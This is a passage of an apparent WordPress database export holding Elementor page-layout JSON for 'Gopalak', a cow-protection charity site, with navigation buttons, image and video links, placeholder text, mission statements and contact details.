Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9244,1588,'_elementor_page_assets','a:0:{}'),(9247,1589,'_elementor_edit_mode','builder'),(9248,1589,'_elementor_template_type','wp-page'),(9249,1589,'_elementor_version','3.7.8'),(9250,1589,'_wp_page_template','elementor_canvas'),(9251,1589,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 